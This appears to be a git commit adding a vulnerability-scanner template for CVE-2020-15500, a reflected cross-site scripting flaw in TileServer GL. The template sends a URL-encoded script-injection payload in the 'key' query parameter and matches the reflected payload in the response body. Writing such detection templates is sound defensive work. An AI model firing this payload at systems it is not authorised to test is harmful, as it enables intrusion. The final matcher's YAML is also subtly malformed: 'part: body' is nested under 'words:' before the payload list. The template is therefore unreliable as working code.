Added CVE-2020-15500

patch-1
sandeep 2021-04-11 16:12:21 +05:30
parent 2c0574af17
commit b05c8f402b
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2020-15500
info:
name: TileServer GL Reflected XSS
author: Akash.C
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
source: https://github.com/maptiler/tileserver-gl/issues/461
tags: cve,cve2020,xss,tileserver
requests:
- method: GET
path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
part: body
- '"><script>alert(document.domain);</script>'